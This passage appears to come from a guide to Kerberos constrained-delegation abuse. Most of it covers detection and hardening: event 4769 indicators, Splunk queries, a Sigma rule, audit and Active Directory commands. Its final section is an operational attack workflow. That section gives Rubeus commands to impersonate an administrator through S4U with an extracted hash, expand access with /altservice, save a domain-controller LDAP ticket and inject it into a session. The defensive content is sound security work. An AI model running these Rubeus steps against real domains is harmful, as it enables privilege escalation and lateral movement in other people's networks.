- Client Address: the requesting host; compare it with where the service account normally runs (::1 only appears when the request originates on the DC itself)
- Ticket Options: 0x40810010 (forwardable, renewable, canonicalize, renewable-ok); look for option combinations a Windows client would not set
- Ticket Encryption Type: 0x17 (RC4) when /rc4 was used for an account that supports AES
Anomaly Detection:
Service accounts requesting tickets for administrators
Rapid succession of S4U2Self → S4U2Proxy events
Cross-domain ticket requests
Service tickets for services not in delegation list
Service Account Anomalies:
Service accounts authenticating outside normal patterns
Requests for high-privilege user impersonation
Access to services outside typical workflow
Authentication from unexpected source IPs
Delegation Pattern Analysis:
Multiple delegation attempts in short timeframes
Failed delegation attempts followed by successful ones
Cross-domain delegation activities
Service substitution patterns (/altservice usage)
Network-Level Indicators:
Kerberos traffic from non-domain member systems
Unusual authentication timing patterns
Multiple service ticket requests to different services
Cross-network authentication attempts
Technical Signatures
API Usage Patterns:
LsaLogonUser / LsaCallAuthenticationPackage with KERB_S4U_LOGON structures (Windows' own S4U path; uncommon outside IIS, AD FS and similar front ends)
Kerberos TGS-REQ traffic to TCP 88 sent by a process other than lsass.exe (Rubeus builds and sends its own requests)
TGS-REQ messages carrying PA-FOR-USER pre-authentication data (padata type 129), the on-the-wire shape of S4U2Self, followed within seconds by a TGS-REQ with an additional ticket (S4U2Proxy)
Process Behavior:
Non-service processes performing delegation
Processes running with service account contexts
Memory access patterns consistent with credential extraction
Rubeus or similar tool execution artifacts
Event Log Configuration
Enable Advanced Auditing: # Configure audit policies on domain controllers
auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable
auditpol /set /subcategory:"Kerberos Authentication Service" /success:enable /failure:enable
# PowerShell has no auditpol subcategory: enable Script Block Logging (event 4104) through Group Policy under Windows Components > Windows PowerShell
SIEM Integration:
Centralized log collection
Real-time event correlation
Baseline establishment
Anomaly detection algorithms
Detection Rules
Splunk Detection: # S4U2Proxy requests (field names as extracted by the Splunk Add-on for Windows). On Windows, 4769 logs the back-end as an account name such as FS01$, not as an SPN, and fills Transited_Services only for S4U2Proxy; matching Account_Name on an "svc_" prefix misses the S4U2Self events, where the service account appears as Service_Name
index=wineventlog EventCode=4769 Transited_Services!="-" | stats count by Account_Name, Service_Name, Transited_Services, Client_Address
# Privileged accounts impersonated through delegation
index=wineventlog EventCode=4769 Transited_Services!="-" Account_Name IN ("administrator*") | table _time, Account_Name, Service_Name, Transited_Services, Client_Address
# Bursts of delegation from one front-end service
index=wineventlog EventCode=4769 Transited_Services!="-" | bucket _time span=1m | stats count by _time, Transited_Services | where count > 10
Sigma Rules: title: S4U2Proxy Constrained Delegation Ticket Request For Privileged User
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4769
        TargetUserName|startswith:
            - 'administrator'
            - 'krbtgt'
    filter_no_delegation:
        TransitedServices: '-'
    condition: selection and not filter_no_delegation
Behavioral Monitoring
Service Account Baselines:
Normal authentication patterns
Typical service access requirements
Expected delegation relationships
Standard operational timeframes
Anomaly Detection:
Deviation from baseline behavior
Unusual authentication sources
Unexpected service access patterns
Off-hours delegation activities
Configuration Hardening
Delegation Minimization Best Practices:
Remove unnecessary delegation configurations
Use resource-based constrained delegation (RBCD)
Implement least-privilege delegation
Regular delegation audits
Account Protection Security Measures:
Enable “Account is sensitive and cannot be delegated”
Use Protected Users group
Implement strong service account passwords
Regular password rotation
Technical Controls: # Disable delegation for sensitive accounts
Set-ADUser -Identity "administrator" -AccountNotDelegated $true
# Add to Protected Users group (members also lose NTLM, RC4 and cached logons; never add service or computer accounts)
Add-ADGroupMember -Identity "Protected Users" -Members "administrator"
# Audit delegation configurations
Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true} -Properties msDS-AllowedToDelegateTo
Network Security
Segmentation:
Isolate service accounts by network segment
Restrict service-to-service communication
Implement micro-segmentation
Monitor cross-segment authentication
Access Controls:
Time-based access restrictions
Source IP validation
Service-specific access policies
Multi-factor authentication requirements
Detection & Response
Real-Time Monitoring: # SIEM Alert Configuration
Alert: Privileged account impersonated through S4U2Proxy
Trigger: 4769 with Transited Services not "-" and Account Name in the privileged list, or more S4U2Proxy events from one front-end service in 5 minutes than its established baseline
Action:
- Alert the security team and confirm against the service's expected delegation pattern before disabling anything (legitimate front ends delegate constantly)
- Disable or reset the service account once abuse is confirmed
- Initiate incident response
- Capture network traffic
Incident Response:
Isolate affected service accounts
Reset service account passwords
Audit delegation configurations
Review authentication logs
Assess lateral movement potential
Implement additional monitoring
Proactive Measures:
Regular delegation audits
Service account inventory
Privilege escalation testing
Security awareness training
Integration Workflows
Discovery Phase
Identify delegation opportunities: # Find delegation-enabled accounts
# PowerShell: Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true}
# Extract service account credentials
Rubeus.exe asktgt /user:discovered_svc /rc4:extracted_hash
Exploitation Phase
Execute delegation attack: # Perform S4U delegation
Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:administrator /msdsspn:target_service /ptt
# Verify successful delegation
Rubeus.exe klist
Analysis & Expansion
Analyze and expand access: # Analyze delegated ticket
Rubeus.exe describe /ticket:base64_ticket
# Expand to related services
Rubeus.exe s4u /ticket:current_tgt /impersonateuser:administrator /msdsspn:original_service /altservice:cifs,host,ldap /ptt
Persistence & Movement
Establish persistence and move laterally: # Save high-value tickets
Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:administrator /msdsspn:ldap/dc.corp.local /outfile:dc_access.kirbi
# Create a dedicated network-only session and inject the ticket into it (use the LUID printed by createnetonly; injecting into another session's LUID requires elevation)
Rubeus.exe createnetonly /program:cmd.exe /show
Rubeus.exe ptt /ticket:dc_access.kirbi /luid:new_session_luid